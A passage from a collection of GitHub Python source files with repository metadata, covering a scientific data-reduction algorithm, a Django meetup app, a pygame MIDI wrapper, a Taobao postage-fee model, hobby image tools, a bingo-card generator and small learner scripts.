\"OSIRIS\"]:\n issues[\"Efixed\"] = \"Can only override Efixed on IRIS and OSIRIS\"\n\n return issues\n\n def _setup(self):\n \"\"\"\n Gets algorithm properties.\n \"\"\"\n\n # Get properties\n self._data_files = self.getProperty(\"InputFiles\").value\n self._sum_files = self.getProperty(\"SumFiles\").value\n self._load_logs = self.getProperty(\"LoadLogFiles\").value\n self._calibration_ws = _ws_or_none(self.getPropertyValue(\"CalibrationWorkspace\"))\n\n self._instrument_name = self.getPropertyValue(\"Instrument\")\n self._analyser = self.getPropertyValue(\"Analyser\")\n self._reflection = self.getPropertyValue(\"Reflection\")\n self._efixed = self.getProperty(\"Efixed\").value\n\n self._spectra_range = self.getProperty(\"SpectraRange\").value\n self._background_range = _elems_or_none(self.getProperty(\"BackgroundRange\").value)\n self._rebin_string = _str_or_none(self.getPropertyValue(\"RebinString\"))\n self._detailed_balance = self.getProperty(\"DetailedBalance\").value\n self._scale_factor = self.getProperty(\"ScaleFactor\").value\n self._fold_multiple_frames = self.getProperty(\"FoldMultipleFrames\").value\n\n self._grouping_method = self.getPropertyValue(\"GroupingMethod\")\n self._grouping_ws = _ws_or_none(self.getPropertyValue(\"GroupingWorkspace\"))\n self._grouping_string = _str_or_none(self.getPropertyValue(\"GroupingString\"))\n self._grouping_map_file = _str_or_none(self.getPropertyValue(\"MapFile\"))\n\n self._output_x_units = self.getPropertyValue(\"UnitX\")\n\n self._output_ws = self.getPropertyValue(\"OutputWorkspace\")\n\n # Disable sum files if there is only one file\n if len(self._data_files) == 1:\n if self._sum_files:\n logger.warning(\"SumFiles disabled when only one input file is provided.\")\n self._sum_files = False\n\n # Get the IPF filename\n self._ipf_filename = os.path.join(\n config[\"instrumentDefinition.directory\"],\n self._instrument_name + \"_\" + self._analyser + \"_\" + self._reflection + \"_Parameters.xml\",\n )\n logger.information(\"Instrument parameter file: %s\" % self._ipf_filename)\n\n # Warn when grouping options are to be ignored\n if self._grouping_method != \"Workspace\" and self._grouping_ws is not None:\n logger.warning(\"GroupingWorkspace will be ignored by selected GroupingMethod\")\n\n if self._grouping_method != \"File\" and self._grouping_map_file is not None:\n logger.warning(\"MapFile will be ignored by selected GroupingMethod\")\n\n # The list of workspaces being processed\n self._workspace_names = []\n\n\n# Register algorithm with Mantid\nAlgorithmFactory.subscribe(ISISIndirectEnergyTransfer)\n","repo_name":"mantidproject/mantid","sub_path":"Framework/PythonInterface/plugins/algorithms/WorkflowAlgorithms/ISISIndirectEnergyTransfer.py","file_name":"ISISIndirectEnergyTransfer.py","file_ext":"py","file_size_in_byte":16601,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"39"} +{"seq_id":"3114891786","text":"import sys\nfrom TileMerger import *\n\n\n\n# input tile folder \ninputTileFolder = \"D:\\\\Dropbox\\\\Instagram\\\\likes\"\n#inputTileFolder = \"D:\\\\projets\\\\code\\\\autres\\\\python\\\\instaMerge\\\\test\\\\input\"\n\n\nmerger = TileMerger()\nmerger.setNbXtiles(24)\nmerger.setNbYtiles(34)\nmerger.setMarginColor(\"#FFFFFF\")\nmerger.setMarginSize(0)\nmerger.setTileExtention(\".jpg\")\nmerger.setTileDirectory(inputTileFolder)\nmerger.setOutputDirectory(\"D:\\\\projets\\\\code\\\\autres\\\\python\\\\instaMerge\\\\test\\\\output\")\nmerger.setTitle(\"instaMergeNoMargin\")\nmerger.mergeTilesAndExport()\n\nos.system(\"pause\")\n","repo_name":"jonathanlurie/pythonStuff","sub_path":"imageMerge/import_tiles.py","file_name":"import_tiles.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16567901987","text":"from django.shortcuts import render, redirect\nfrom .models import Meetup, Participant\nfrom .forms import RegistrationForm\n\n'''\nfunctions will be invoked automatically by django when we have an incoming request for a certain URL.\n'''\n\n\ndef index(request):\n meetups = Meetup.objects.all()\n template = render(request, 'meetups/index.html', {'meetups': meetups})\n return template\n\ndef meetup_details(request, meetup_slug):\n try:\n selected_meetup = Meetup.objects.get(slug=meetup_slug) # selected_meetup is a Meetup object. get() gets the correct object based on the slug passed in.\n if request.method == 'GET':\n registration_form = RegistrationForm()\n \n else:\n registration_form = RegistrationForm(request.POST) # passes in the POST request's fields into RegistrationForm\n if registration_form.is_valid(): # checks if inputs are valid, built in function\n user_email = registration_form.cleaned_data['email']\n participant, was_created = Participant.objects.get_or_create(email=user_email)\n selected_meetup.participants.add(participant) # adds the participant created above into the participants attribute in the Meetup object. \n return redirect('confirm_registration', meetup_slug=meetup_slug)\n\n return render(request, 'meetups/meetup-details.html', {\n 'meetup_found': True,\n 'meetup': selected_meetup,\n 'form': registration_form\n })\n except Exception as exc:\n return render(request, 'meetups/meetup-details.html', {'meetup_found': False})\n \n\ndef confirm_registration(request, meetup_slug):\n meetup = Meetup.objects.get(slug=meetup_slug)\n return render(request, 'meetups/registration-success.html', {'meetup': meetup})","repo_name":"tanshihuai/Django-Project","sub_path":"django_course_site/meetups/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"29380853401","text":"from os import environ\nenviron['PYGAME_HIDE_SUPPORT_PROMPT'] = '1'\n\nimport pygame\nimport pygame.midi\nimport pygame.version\nimport time\n\nimport midi_util\n\n\nclass MIDI:\n def __init__(self, verbose=False):\n self._verbose = verbose\n self._midi_in = None\n self._midi_out = None\n self._midi_in_port_id = None\n self._midi_out_port_id = None\n self._midi_in_port_name = None\n self._midi_out_port_name = None\n\n def _init(self):\n if not self._midi_in and not self._midi_out:\n # Initialize PyGame MIDI\n pygame.midi.init()\n\n def _end(self):\n if not self._midi_in and not self._midi_out:\n # Quit PyGame MIDI\n pygame.midi.quit()\n\n @staticmethod\n def get_backend_name():\n return 'pygame'\n\n @staticmethod\n def get_backend_version():\n return pygame.version.ver\n\n # def print_available_ports(self):\n # # Initialize PyGame MIDI\n # self._init()\n #\n # # Print MIDI input and output port ID's and names\n # print('MIDI output ports:')\n # port_id = 1\n # for i in range(pygame.midi.get_count()):\n # (midi_interface, midi_name, midi_input, midi_output, opened) = pygame.midi.get_device_info(i)\n # if midi_output:\n # print(' {}: {} OUT'.format(port_id, midi_name.decode('utf-8')))\n # port_id += 1\n #\n # # Print MIDI input and output port ID's and names\n # print('MIDI input ports:')\n # port_id = 1\n # for i in range(pygame.midi.get_count()):\n # (midi_interface, midi_name, midi_input, midi_output, opened) = pygame.midi.get_device_info(i)\n # if midi_input:\n # print(' {}: {} IN'.format(port_id, midi_name.decode('utf-8')))\n # port_id += 1\n #\n # # End PyGame MIDI\n # self._end()\n\n def get_ports_in(self):\n # Initialize PyGame MIDI\n self._init()\n\n ports = []\n for i in range(pygame.midi.get_count()):\n (midi_interface, midi_name, midi_input, midi_output, opened) = pygame.midi.get_device_info(i)\n if midi_input:\n ports.append(midi_name.decode('utf-8'))\n\n # End PyGame MIDI\n self._end()\n\n return ports\n\n def is_port_in_open(self):\n if self._midi_in:\n return True\n return False\n\n def port_in_open(self, port_id):\n if self.is_port_in_open():\n return True\n\n # Initialize PyGame MIDI\n self._init()\n\n # Open MIDI input port\n port_in_id = 0\n for i in range(pygame.midi.get_count()):\n (midi_interface, midi_name, midi_input, midi_output, opened) = pygame.midi.get_device_info(i)\n if midi_input:\n if port_id == port_in_id:\n # Open MIDI input port\n self._midi_in = pygame.midi.Input(i)\n\n # Get MIDI input port id\n self._midi_in_port_id = port_in_id\n\n # Get MIDI input port name\n self._midi_in_port_name = midi_name.decode('utf-8')\n self._midi_in_port_name += ' IN'\n\n break\n port_in_id += 1\n\n if not self._midi_in:\n return False\n\n # Return MIDI input port open status\n return self.is_port_in_open()\n\n def port_in_close(self):\n if self._midi_in:\n self._midi_in.close()\n self._midi_in = None\n self._midi_in_port_name = None\n\n # End PyGame MIDI\n self._end()\n\n def get_port_in_id(self):\n if self._midi_in_port_id:\n return self._midi_in_port_id\n\n def get_port_in_name(self):\n if self._midi_in_port_name:\n return self._midi_in_port_name\n\n def get_ports_out(self):\n # Initialize PyGame MIDI\n self._init()\n\n ports = []\n for i in range(pygame.midi.get_count()):\n (midi_interface, midi_name, midi_input, midi_output, opened) = pygame.midi.get_device_info(i)\n if midi_output:\n ports.append(midi_name.decode('utf-8'))\n\n # End PyGame MIDI\n self._end()\n\n return ports\n\n def is_port_out_open(self):\n if self._midi_out:\n return True\n return False\n\n def port_out_open(self, port_id):\n if self.is_port_out_open():\n return True\n\n # Initialize PyGame MIDI\n self._init()\n\n # Check MIDI output port ID\n if port_id < 0:\n if self._verbose:\n print('Error: Invalid MIDI output port ID {}'.format(port_id))\n return False\n\n # Open MIDI output port\n port_out_id = 0\n for i in range(pygame.midi.get_count()):\n (midi_interface, midi_name, midi_input, midi_output, opened) = pygame.midi.get_device_info(i)\n if midi_output:\n if port_out_id == port_id:\n # Open MIDI output port\n self._midi_out = pygame.midi.Output(i)\n\n # MIDI output port id\n self._midi_out_port_id = port_out_id\n\n # Get MIDI output port name\n self._midi_out_port_name = midi_name.decode('utf-8')\n self._midi_out_port_name += ' OUT'\n\n break\n port_out_id += 1\n\n # Check if MIDI port is output\n if not self._midi_out:\n if self._verbose:\n print('Error: \"{}: {}\" is not a MIDI output port'.format(port_id, self._midi_out_port_name))\n return False\n\n # Return MIDI output port open status\n return self.is_port_out_open()\n\n def port_out_close(self):\n if self._midi_out:\n self._midi_out.close()\n self._midi_out = None\n self._midi_out_port_name = None\n\n # End PyGame MIDI\n self._end()\n\n def get_port_out_id(self):\n if self._midi_out_port_id:\n return self._midi_out_port_id\n\n def get_port_out_name(self):\n if self._midi_out_port_name:\n return self._midi_out_port_name\n\n def send_message(self, message):\n if not self.is_port_out_open():\n if self._verbose:\n print('MIDI output port not open')\n return False\n\n if self._verbose:\n midi_util.print_message('TX', message)\n\n t_start = time.time()\n if message[0] == 0xf0:\n # Write SYSEX message asynchronous to MIDI output port\n self._midi_out.write_sys_ex(pygame.midi.time(), message)\n else:\n # Write MIDI message asynchronous to MIDI output port\n self._midi_out.write(message)\n\n # Wait until message transferred\n wait_time = len(message) * midi_util.MIDI_BYTE_TIME\n wait_time -= time.time() - t_start\n if wait_time > 0:\n time.sleep(wait_time)\n\n return True\n\n def receive_message(self):\n if not self.is_port_in_open():\n if self._verbose:\n print('MIDI output port not open')\n return\n\n # Asynchronous MIDI receive\n if self._midi_in.poll():\n # Read one 4 Bytes MIDI message\n message = self._midi_in.read(1)[0][0]\n\n if self._verbose:\n midi_util.print_message('RX', message)\n\n return message\n","repo_name":"Erriez/midi-sysex-io","sub_path":"midi_pygame.py","file_name":"midi_pygame.py","file_ext":"py","file_size_in_byte":7445,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"9828561596","text":"# -*- coding:utf8 -*-\nfrom __future__ import unicode_literals\nimport datetime\nfrom django.db import models\nfrom shopapp.signals import modify_fee_signal\n\n\nclass FeeRule(models.Model):\n payment = models.FloatField(verbose_name='交易金额')\n discount = models.FloatField(default=1, verbose_name='邮费折扣')\n adjust_fee = models.FloatField(null=True, verbose_name='邮费调整金额')\n\n class Meta:\n db_table = 'shop_modifyfee_feerule'\n app_label = 'modifyfee'\n verbose_name = u'邮费规则'\n verbose_name_plural = u'邮费规则列表'\n\n def __unicode__(self):\n return '<%d,%s,%s,%s>' % (self.id, str(self.payment), str(self.discount), str(self.adjust_fee))\n\n\nclass ModifyFee(models.Model):\n id = models.AutoField(primary_key=True)\n tid = models.BigIntegerField(verbose_name='淘宝交易ID')\n buyer_nick = models.CharField(max_length=32, verbose_name='买家昵称')\n total_fee = models.CharField(max_length=10, verbose_name='订单金额')\n payment = models.CharField(max_length=10, verbose_name='实付金额')\n post_fee = models.CharField(max_length=10, verbose_name='实付邮费')\n modify_fee = models.CharField(max_length=10, verbose_name='修改邮费')\n modified = models.DateTimeField(blank=True, null=True)\n\n class Meta:\n db_table = 'shop_modifyfee_modifyfee'\n app_label = 'modifyfee'\n verbose_name = u'邮费修改记录'\n verbose_name_plural = u'邮费修改记录列表'\n\n def __unicode__(self):\n return '<%d,%s,%s,%s>' % (self.id, self.name, self.payment, self.modify_fee)\n\n\ndef modify_post_fee_func(sender, user_id, trade_id, *args, **kwargs):\n from shopback.orders.models import Trade\n from shopback.trades.models import MergeTrade\n try:\n trade = Trade.get_or_create(trade_id, user_id)\n except:\n pass\n else:\n payment = float(trade.payment or '0')\n post_fee = float(trade.post_fee or '0')\n fee_rules = FeeRule.objects.order_by('-payment')\n for rule in fee_rules:\n if payment >= rule.payment:\n modify_fee = rule.adjust_fee if rule.adjust_fee != None else post_fee * (rule.discount or 1.0)\n response = apis.taobao_trade_postage_update(tid=trade_id,\n post_fee=modify_fee,\n tb_user_id=trade.user.visitor_id)\n postage = response['trade_postage_update_response']['trade']\n ModifyFee.objects.get_or_create(tid=trade_id,\n buyer_nick=trade.buyer_nick,\n total_fee=postage['total_fee'],\n post_fee=post_fee,\n modify_fee=postage['post_fee'],\n payment=postage['payment'],\n modified=postage['modified'])\n Trade.objects.filter(id=trade_id).update(total_fee=postage['total_fee'],\n post_fee=postage['post_fee'],\n payment=postage['payment'],\n modified=postage['modified'])\n MergeTrade.objects.filter(tid=trade_id).update(total_fee=postage['total_fee'],\n post_fee=postage['post_fee'],\n payment=postage['payment'],\n modified=postage['modified'])\n break\n\n\nmodify_fee_signal.connect(modify_post_fee_func, sender='modify_post_fee', dispatch_uid='modify_post_fee')\n","repo_name":"xiaolusys/xiaolusys","sub_path":"shopapp/modifyfee/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"17805802171","text":"\ndef getElves(file_name):\n '''\n Function to import the list of calories per elf, splitting the list by blank line.\n '''\n\n with open(file_name, \"r\") as inputfile:\n elfList = inputfile.read().split(\"\\n\\n\")\n \n return elfList\n\n\ndef findCalories(elfList):\n '''\n Taking the list of Elves and seeing which Elf is carrying the most calories.\n\n '''\n maxCalories = 0\n for elf in elfList:\n elfCalories = elf.strip().split(\"\\n\")\n elfCalories = [int(i) for i in elfCalories]\n if sum(elfCalories) >= maxCalories:\n maxCalories = sum(elfCalories)\n \n return maxCalories\n\ndef findTopThreeCalories(elfList):\n\n '''\n Taking the list of Elves and creating a dict of all the totals, then returning the sum of the top 3. \n\n '''\n \n summedCalories = []\n for elf in elfList:\n elfCalories = elf.strip().split(\"\\n\")\n elfCalories = [int(i) for i in elfCalories]\n summedCalories.append(sum(elfCalories))\n \n return sum(sorted (summedCalories, reverse=True) [0:3])\n\nif __name__ == \"__main__\":\n input_path = \"./day_01/input.txt\"\n\n elfList = getElves(input_path)\n # maxCalories = findCalories(elfList)\n topThreeCalories = findTopThreeCalories(elfList)\n print (topThreeCalories)\n","repo_name":"mckechniefraz/Advent_of_code_2022","sub_path":"day_01/calorie_counting.py","file_name":"calorie_counting.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36249865241","text":"import sys\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtCore import QObject, QThread, pyqtSignal\r\nfrom time_ui import Ui_Time\r\nfrom t_time import timing\r\nfrom signals import signals\r\n\r\nclass TimeMain(QObject):\r\n\tdef __init__(self):\r\n\t\tprint(\"time running\")\r\n\t\tsuper().__init__()\r\n\r\n\t\tself.MainWindow = QtWidgets.QMainWindow()\r\n\t\tself.ui = Ui_Time()\r\n\t\tself.ui.setupUi(self.MainWindow)\r\n\t\tself.MainWindow.show()\r\n\r\n\t\tself.time_thread = QThread()\r\n\t\tself.time = timing()\r\n\t\tself.time.moveToThread(self.time_thread)\r\n\t\tself.time_thread.start()\r\n\r\n\t\tself.ui.label_5.setText(\" \" + str(0))\r\n\t\tself.ui.label_3.setText(\" 0:0:0\")\r\n\t\tsignals.time.emit(0,0,0,0)\r\n\r\n\t\tsignals.time.connect(self.update_gui)\r\n\t\tsignals.pause.connect(self.pause)\r\n\t\tself.ui.lineEdit.editingFinished.connect(self.set_multiplier)\r\n\r\n\r\n\tdef update_gui(self,s,m,h,t):\r\n\t\tself.ui.label_3.setText(\" \" + str(h) + \":\" + str(m) + \":\" + str(s))\r\n\r\n\tdef set_multiplier(self):\r\n\t\tmult = self.ui.lineEdit.text()\r\n\r\n\t\tAlphaFlag = False\r\n\t\t#Error checking to make sure input is only an INT\r\n\t\tfor i in self.ui.lineEdit.text():\r\n\t\t\tif(i.isalpha() == True):\r\n\t\t\t\tAlphaFlag = True\r\n\r\n\t\tif(AlphaFlag == True):\r\n\t\t\tself.ui.label_5.setText(\" \" + str(1))\r\n\t\t\tsignals.time_multiplier.emit(1)\r\n\t\telif(self.ui.lineEdit.text().isdigit() == True):\r\n\t\t\tAlphaFlag = False\r\n\t\t\tself.ui.label_5.setText(\" \" + str(mult))\r\n\t\t\tsignals.time_multiplier.emit(int(mult))\r\n\r\n\tdef pause(self):\r\n\t\tself.ui.label_5.setText(\" \" + str(0))\r\n\t\tsignals.time_multiplier.emit(0)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QtWidgets.QApplication(sys.argv)\r\n c = TimeMain()\r\n app.exec_()\r\n","repo_name":"robertfoster5/1140_Team_Falcon","sub_path":"senv/time_main.py","file_name":"time_main.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"12702121660","text":"import textwrap, random, numpy as np, math, os\nfrom PIL import Image, ImageFont, ImageDraw\nfrom time import perf_counter\nfrom os import listdir\n\n#variables for layout\nmargins_size, cells_size, border_size = (33, 288, 10)\nhighlight_opacity, shadow_opacity, celltop_opacity, cellbottom_opacity = (170, 128, 140, 80)\nletters_per_line, name_line_size = (13, 150)\n\npresets = {\n \"direct\":{\n \"type\":\"direct\",\n \"color\":\"#e41318ff\",\n \"namecolor\":(255,255,255)\n },\n \"e3\":{\n \"type\":\"e3\",\n \"color\":\"#353a4aff\",\n \"namecolor\":(255,255,255)\n },\n \"stateofplay\":{\n \"type\":\"stateofplay\",\n \"color\":\"#006fcdff\",\n \"namecolor\":(255,255,255)\n },\n \"tga\":{\n \"type\":\"tga\",\n \"color\":\"#eeeeeeff\",\n \"namecolor\":(60,60,60)\n }\n}\n\nif True:\n while True:\n print(\"What type of card are you doing? Choices are \" + ', '.join(presets.keys()))\n response = input()\n type = presets[response][\"type\"]\n color = presets[response][\"color\"]\n namecolor = presets[response][\"namecolor\"]\n if response not in presets:\n print(\"Please try again\")\n continue\n break\n\n free = True\n print(\"Type 'no' if you would like to exclude the free space\")\n if input() == \"no\":\n free = False\n\n print(\"How many columns and rows should there be?\")\n size = int(input())\n\n print(\"What is the name on the card?\")\n name = input()\nelse:\n response = \"e3\"\n type = presets[response][\"type\"]\n color = presets[response][\"color\"]\n namecolor = presets[response][\"namecolor\"]\n free = True\n size = 5\n name = \"ram\"\n\nprint(\"Card printing imminently...\")\n\n\n#functions\ndef make_shadow_box(width,height,toplight,bottomlight):\n border_edges_image = Image.new(\"RGBA\", (width, height), \"#0000\")\n draw = ImageDraw.Draw(border_edges_image)\n draw.polygon([\n (0,0),(border_size,border_size),(border_size,height-border_size),(0,height)\n ],fill=toplight)\n draw.polygon([\n (0,0),(border_size,border_size),(width-border_size,border_size),(width,0)\n ],fill=toplight)\n draw.polygon([\n (width,0),(width,height),(width-border_size,height-border_size),(width-border_size,border_size)\n ],fill=bottomlight)\n draw.polygon([\n (0,height),(border_size,height-border_size),(width-border_size,height-border_size),(width,height)\n ],fill=bottomlight)\n return border_edges_image\n\nt_start = perf_counter()\n\n#get assets\nif free:\n with Image.open(\"assets/\" + type + \"_free.png\") as freespace:\n freespace.convert(\"RGBA\")\nwith Image.open(\"assets/\"+type+\"_logo.png\") as logo:\n logo.convert(\"RGBA\")\n\nprint(\"Checkpoint 1\", perf_counter()-t_start)\nt_start = perf_counter()\n\n#calculate and create background at size\nwidth = size * (margins_size + cells_size) + margins_size\nif margins_size * 2 + logo.width > width:\n width = margins_size * 2 + logo.width\nimage = Image.new(\"RGBA\", (width, size * (margins_size + cells_size) + margins_size * 3 + logo.height + name_line_size), color)\n\n#create highlighted border edges\nimage.alpha_composite(\n make_shadow_box(\n image.width,\n image.height,\n (255,255,255,highlight_opacity),\n (0,0,0,shadow_opacity)\n )\n)\n\nprint(\"Checkpoint 2\", perf_counter()-t_start)\nt_start = perf_counter()\n\n#draw logo\nimage.alpha_composite(logo,(math.floor(image.width/2 - logo.width / 2),margins_size),(0,0))\n\ndef get_card(path):\n im = Image.open(\"cards/\" + path).convert(\"RGBA\")\n\n #resize the image\n if im.width > im.height:\n box=(\n math.floor(im.width/2-im.height/2),\n 0,\n math.floor(im.width/2+im.height/2),\n im.height\n )\n else:\n box=(\n 0,\n math.floor(im.height/2-im.width/2),\n im.width,\n math.floor(im.height/2+im.width/2)\n )\n im = im.crop(box).resize((cells_size,cells_size))\n \n #give it a shadowbox\n im.alpha_composite(\n make_shadow_box(\n im.width,\n im.height,\n (0,0,0,celltop_opacity),\n (0,0,0,cellbottom_opacity)\n )\n )\n\n name = os.path.splitext(path)[0]\n\n #add text to the image\n font = ImageFont.truetype(\"LemonMilk.otf\", 30)\n words = '\\n'.join(textwrap.wrap(name,letters_per_line))\n draw = ImageDraw.Draw(im)\n draw.text((border_size,0),words,font=font, fill=(0,0,0))\n draw.text((border_size+2,0),words,font=font, fill=(0,0,0))\n draw.text((border_size,2),words,font=font, fill=(0,0,0))\n draw.text((border_size+2,2),words,font=font, fill=(0,0,0))\n draw.text((border_size+1,1),words,font=font, fill=(255,255,255))\n\n return im\n\n#get images and crop\ncards = listdir(\"cards/\")\nrandom.shuffle(cards)\ncards_array = []\nfor index,value in enumerate(cards):\n if free and math.floor((size*size)/2) == index:\n cards_array.append(freespace)\n cards_array.append(get_card(value))\n\nprint(\"Checkpoint 3\", perf_counter()-t_start)\nt_start = perf_counter()\n\nfor index,value in enumerate(cards_array):\n if (index>=size*size):\n break\n \n image.paste(\n value,\n (\n math.floor(image.width / 2 - (size * cells_size + (size - 1) * margins_size)/2 + ((index % size) * cells_size + ((index % size) ) * margins_size) + cells_size/2 - value.width/2),\n math.floor(index/size) * (margins_size + cells_size) + margins_size * 2 + logo.height + math.floor(cells_size / 2 - value.height / 2)\n ),\n value\n )\n\nprint(\"Checkpoint 4\", perf_counter()-t_start)\nt_start = perf_counter()\n\n#write name at the bottom of the card\nfont = ImageFont.truetype(\"SylexiadSansMedium-Bold.otf\", 270)\ndraw = ImageDraw.Draw(image)\ndraw.text(\n (\n margins_size,\n image.height-margins_size-math.floor(name_line_size*1.25)\n ),\n name,font=font,fill=namecolor\n)\n\nprint(\"Checkpoint 5\", perf_counter()-t_start)\n\n#size * (margins_size + cells_size) + margins_size * 2 + logo.height)\n#save image\nimage.save(\"bingo_out.png\")\nprint(\"Card printing complete, please read your files\")\n","repo_name":"DenowRammy/BingoCards","sub_path":"bingo.py","file_name":"bingo.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"30026967281","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import filedialog\r\nfrom tkinter import StringVar\r\nimport os\r\n\r\nfrom PIL import Image\r\nimport matplotlib.image as mimg\r\n\r\n#External file import#########################################################################\r\ntry:\r\n from LoadMessages import * \r\n \r\nexcept ImportError:\r\n print('dependent file import error')\r\n raise SystemExit\r\n#############################################################################################\r\n\r\nclass ImageRGB(tk.Frame):\r\n def IndividualRGB(self):\r\n topRGB = tk.Toplevel(self)\r\n topRGB.title(\"Creating individual images from RGB sets\")\r\n topRGB.geometry(\"900x140\")\r\n \r\n #Set variable input, output path string & operation done text\r\n FileInput = StringVar()\r\n FolderOutput = StringVar()\r\n RGBRun = StringVar()\r\n self.OType = tk.IntVar(0)\r\n \r\n def AskInput(self):\r\n file_selected = filedialog.askopenfile()\r\n topRGB.lift()\r\n try:\r\n FileInput.set(file_selected.name)\r\n except:\r\n FileInput.set('')\r\n\r\n def AskOutput(self):\r\n folder_selected = filedialog.askdirectory()\r\n topRGB.lift() \r\n folder_selected = folder_selected + \"/\"\r\n FolderOutput.set(folder_selected)\r\n \r\n def OpenRGB(OType,IFile,OPath): \r\n #OPENRGB #########################################################\r\n list_RGB = None\r\n im = None\r\n width = None\r\n height = None\r\n \r\n if (os.path.isfile(IFile)==False or os.path.isdir(OPath)==False):\r\n RunErrorIO(RGBRun)\r\n elif IFile.endswith(\".png\")==False:\r\n RunNotPNG(RGBRun)\r\n else:\r\n RunOn(RGBRun)\r\n \r\n try:\r\n im = Image.open(IFile) #your image\r\n im = im.convert('RGB')\r\n \r\n width = im.size[0] #define W and H\r\n height = im.size[1]\r\n \r\n list_RGB = []\r\n \r\n for x in range(width):\r\n for y in range(height):\r\n RGB = im.getpixel((x,y))\r\n \r\n if RGB not in list_RGB:\r\n list_RGB.append(RGB)\r\n except:\r\n RunErrorLoad(RGBRun)\r\n \r\n LoadRGB(list_RGB,im,width,height,OType,OPath)\r\n \r\n def LoadRGB(list_RGB,im,width,height,OType,OPath):\r\n #LOADRGB #################################################\r\n if OType==0:\r\n RunOptionUnavailable(RGBRun)\r\n elif OType==1:\r\n im_new=[]\r\n for i in range(0,len(list_RGB)):\r\n im_new.append(i)\r\n \r\n for colors in range(0,len(list_RGB)): \r\n im_new[colors] = Image.new('RGB',(width,height))\r\n i=0\r\n \r\n for x in range(width):\r\n for y in range(height):\r\n \r\n if im.getpixel((x,y))==list_RGB[colors]:\r\n im_new[colors].putpixel((x,y),list_RGB[colors])\r\n else:\r\n pass\r\n #im_new[colors].putpixel((x,y),(255,255,255))\r\n \r\n #Save 1 file for each different color in hex or RGB\r\n try:\r\n mimg.imsave(OPath + '-'.join(map(str,list_RGB[colors])) + \".png\", im_new[colors])\r\n except: \r\n RunErrorSave(RGBRun)\r\n break\r\n \r\n RunFinish(RGBRun)\r\n ############################################################\r\n \r\n RunStart(RGBRun)\r\n\r\n\r\n#FORMATING##############################################################################################################\r\n\r\n #Buttons to load input/output folders, set label to empty\r\n buttonInput= ttk.Button(topRGB, text=\"Select input file\",command=lambda: [AskInput(self),RunStart(RGBRun)])\r\n buttonOutput= ttk.Button(topRGB, text=\"Select output path\",command=lambda: [AskOutput(self),RunStart(RGBRun)])\r\n \r\n rbSingleColor = ttk.Radiobutton(topRGB,text=\"Export a single color\",variable=self.OType,value=0,command=lambda:RunStart(RGBRun))\r\n rbAllColors = ttk.Radiobutton(topRGB,text=\"Export all colors\",variable=self.OType,value=1,command=lambda:RunStart(RGBRun))\r\n \r\n #Input/output paths chosen\r\n #Text in front of input / output paths chosen\r\n SaveInput = ttk.Label(topRGB, textvariable=FileInput)\r\n SaveOutput = ttk.Label(topRGB, textvariable=FolderOutput)\r\n SaveTextI = ttk.Label(topRGB, text=\"INPUT FILE:\")\r\n SaveTextO = ttk.Label(topRGB, text=\"OUTPUT PATH:\")\r\n \r\n #Run tool with selected directories\r\n buttonRunRGB = ttk.Button(topRGB, text=\"Run tool\",command=lambda: [RunStart(RGBRun),OpenRGB(self.OType.get(),FileInput.get(),FolderOutput.get())])\r\n \r\n #Variable label based on status of tool\r\n RGBRunText = ttk.Label(topRGB, textvariable=RGBRun)\r\n #Exit button for topRGB\r\n buttonExit = ttk.Button(topRGB, text=\"Exit\", command=lambda: topRGB.destroy())\r\n \r\n #Setting default column widths for topRGB\r\n topRGB.grid_columnconfigure(1, minsize=100)\r\n topRGB.grid_columnconfigure(2, minsize=100)\r\n topRGB.grid_columnconfigure(3, minsize=400)\r\n \r\n #Placing widgets on topRGB frame\r\n buttonInput.grid(sticky='NSEW',row=0,column=0)\r\n buttonOutput.grid(sticky='NSEW',row=1,column=0)\r\n SaveTextI.grid(sticky='E',row=0, column=1)\r\n SaveTextO.grid(sticky='E',row=1, column=1)\r\n SaveInput.grid(sticky='W',row=0, column=2)\r\n SaveOutput.grid(sticky='W',row=1, column=2)\r\n rbSingleColor.grid(sticky='NSEW',row=2,column=0)\r\n rbAllColors.grid(sticky='NSEW',row=3,column=0)\r\n \r\n buttonRunRGB.grid(sticky='NSEW',row=5,column=0)\r\n RGBRunText.grid(sticky='NSEW',row=5, column=1,columnspan=3)\r\n buttonExit.grid(sticky='NSEW',row=5,column=4)","repo_name":"Mapl3Sn0w/CryptoGUI","sub_path":"ImageRGB.py","file_name":"ImageRGB.py","file_ext":"py","file_size_in_byte":6672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72516561074","text":"num1 = 5\nnum2 = 3\nsum = num1 + num2\nprint (str(num1) + \"+\" + str(num2) + \"=\" + str(sum))\n\nnum3 = int(input ())\nnum4 = int(input ())\nsum2 = num3 + num4\nprint (str(num3) + \"+\" + str(num4) + \"=\" + str(sum2))\nnumber1 = int(input (\"pirmais skaitlis\"))\nanswer = input (\"izvelies a=saskaitit b=atnemt c=reizinat d=dalit\")\nnumber2 = int(input(\"otrais cipars\"))\nanswer2 = number1 + answer + number2\nprint (str(number1) + (answer) + str(number2) + \"=\" + str(answer2))\n\n","repo_name":"artiamus/artiam","sub_path":"print (1 + 7).py","file_name":"print (1 + 7).py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"26243842592","text":"import os\nimport sys\nfrom 